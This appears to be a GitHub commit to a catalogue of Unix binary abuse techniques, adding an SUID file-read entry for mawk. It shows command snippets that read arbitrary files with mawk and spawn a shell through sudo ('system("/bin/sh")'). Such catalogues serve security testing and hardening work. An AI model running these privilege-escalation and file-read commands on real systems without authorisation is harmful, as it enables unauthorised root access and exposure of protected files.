Add SUID category to mawk as file read

This commit is contained in:
Nick Blekherman 2021-01-18 09:48:12 +02:00 committed by GitHub
parent 31b69cfeed
commit c293ed20f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -10,6 +10,10 @@ functions:
- code: |
LFILE=file_to_read
mawk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./mawk '//' "$LFILE"
sudo:
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
limited-suid: